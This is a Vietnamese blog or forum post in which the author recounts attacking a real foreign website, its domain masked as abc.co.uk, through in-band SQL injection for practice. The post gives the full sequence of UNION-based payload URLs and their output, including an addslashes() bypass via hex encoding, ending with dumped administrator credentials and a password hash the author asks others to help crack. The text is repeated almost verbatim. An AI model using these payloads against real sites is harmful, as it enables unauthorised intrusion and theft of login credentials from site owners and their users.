Chào mọi người, mình mò mãi được 1 site nước ngoài bị lỗi SQL Injection mà có thể khai thác qua
phương pháp Inband, nên tập tấn công thử xem, đây là 1 phương pháp đơn giản và dể dàng nhất đối với anh em biết đến SQL Injection, nhưng còn vấp phải 1 số lỗi, cụ thể mình xin trình bày nhanh:
Trước tiên mình cũng xin gửi lời cám ơn đến 2 ad talentkong và xiuchac bên diễn đàn ceh.vn đã giúp đỡ mình trong các thao tác.
Trang mình làm dạng là:
Code:
http://www.abc.co.uk/node.php?id=1
chạy ok không lỗi
tiếp theo chạy
Code:
http://www.abc.co.uk/node.php?id=1'
ok đã thấy lỗi SQL Injection
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Tiếp theo tìm số cột bằng cách chạy
Code:
http://www.abc.co.uk/node.php?id=1 order by 1--
rồi dần dần tăng lên 1 đơn vị thì thấy đến 5 là báo lỗi suy ra có 4 cột từ 1-4, ok bước này xong
Tiếp theo chạy
Code:
http://www.abc.co.uk/node.php?id=nul union select 1,2,3,4--
để tìm số cột bị lỗi và ở đây nó báo là 4
Tiếp theo chạy
Code:
http://www.abc.co.uk/node.php?id=null union select 1,2,3,version()--
để lấy version database thì thấy hiện Code:
5.1.73-log
Tiếp theo chay
Code:
http://www.abc.co.uk/node.php?id=5 union select 1,2,3,group_concat(schema_name) from information_schema.schemata--
để lấy tên database thì thấy báo Code:
information_schema,db312892314
ok bước này xong
Tiếp theo chạy
Code:
http://www.abc.co.uk/node.php?id=5 union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()--
để lấy danh sách bảng trong database thì thấy hiện 1 đống các bảng sau
Code:
administrators,album,events,gallery,links,news,p_album,p_categories,p_events,p_gallery,p_links,p_news,p_products,p_salsa,p_suscriptors,p_users,p_videos,salsa,suscriptors,users,videos
Tiếp theo chạy
Code:
http://www.abc.co.uk/node.php?id=5 uNion seleCt 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x61646d696e6973747261746f7273--
đề lấy các cột trong bảng administrators, ở đây phải thực hiện phương pháp bypass filter addslashes() chứ gõ administrator là không được.
thấy hiện lên các cột Code:
id, user_name,user_password
ok bước này xong
Tiếp theo là bước quan trọng gần xong là lấy user_name và pass trong các cột của bảng administrators
Mình chạy truy vấn sau
Code:
http://www.abc.co.uk/node.php?id=5 uNion seleCt 1,2,3,group_concat(id,0x2f,user_name,0x2f,user_password) from administrators -- -
thì đã lấy được user và pass nhưng pass dạng sau
Code:
$P$Bstga7byV42vvh7WVT/pPFPZw6j7ET.
thì dầu đoạn mã trên có ký tự $P$B thì biết đó là kiểu Decrypt MD5 $Wordpress gì đấy, vào mấy trang decrypt online mà không ăn thua, ai có cao kiến gì không ?
phương pháp Inband, nên tập tấn công thử xem, đây là 1 phương pháp đơn giản và dể dàng nhất đối với anh em biết đến SQL Injection, nhưng còn vấp phải 1 số lỗi, cụ thể mình xin trình bày nhanh:
Trước tiên mình cũng xin gửi lời cám ơn đến 2 ad talentkong và xiuchac bên diễn đàn ceh.vn đã giúp đỡ mình trong các thao tác.
Trang mình làm dạng là:
Code:
http://www.abc.co.uk/node.php?id=1
chạy ok không lỗi
tiếp theo chạy
Code:
http://www.abc.co.uk/node.php?id=1'
ok đã thấy lỗi SQL Injection
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Tiếp theo tìm số cột bằng cách chạy
Code:
http://www.abc.co.uk/node.php?id=1 order by 1--
rồi dần dần tăng lên 1 đơn vị thì thấy đến 5 là báo lỗi suy ra có 4 cột từ 1-4, ok bước này xong
Tiếp theo chạy
Code:
http://www.abc.co.uk/node.php?id=nul union select 1,2,3,4--
để tìm số cột bị lỗi và ở đây nó báo là 4
Tiếp theo chạy
Code:
http://www.abc.co.uk/node.php?id=null union select 1,2,3,version()--
để lấy version database thì thấy hiện Code:
5.1.73-log
Tiếp theo chay
Code:
http://www.abc.co.uk/node.php?id=5 union select 1,2,3,group_concat(schema_name) from information_schema.schemata--
để lấy tên database thì thấy báo Code:
information_schema,db312892314
ok bước này xong
Tiếp theo chạy
Code:
http://www.abc.co.uk/node.php?id=5 union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()--
để lấy danh sách bảng trong database thì thấy hiện 1 đống các bảng sau
Code:
administrators,album,events,gallery,links,news,p_album,p_categories,p_events,p_gallery,p_links,p_news,p_products,p_salsa,p_suscriptors,p_users,p_videos,salsa,suscriptors,users,videos
Tiếp theo chạy
Code:
http://www.abc.co.uk/node.php?id=5 uNion seleCt 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x61646d696e6973747261746f7273--
đề lấy các cột trong bảng administrators, ở đây phải thực hiện phương pháp bypass filter addslashes() chứ gõ administrator là không được.
thấy hiện lên các cột Code:
id, user_name,user_password
ok bước này xong
Tiếp theo là bước quan trọng gần xong là lấy user_name và pass trong các cột của bảng administrators
Mình chạy truy vấn sau
Code:
http://www.abc.co.uk/node.php?id=5 uNion seleCt 1,2,3,group_concat(id,0x2f,user_name,0x2f,user_password) from administrators -- -
thì đã lấy được user và pass nhưng pass dạng sau
Code:
$P$Bstga7byV42vvh7WVT/pPFPZw6j7ET.
thì dầu đoạn mã trên có ký tự $P$B thì biết đó là kiểu Decrypt MD5 $Wordpress gì đấy, vào mấy trang decrypt online mà không ăn thua, ai có cao kiến gì không ?
Nhận xét
Đăng nhận xét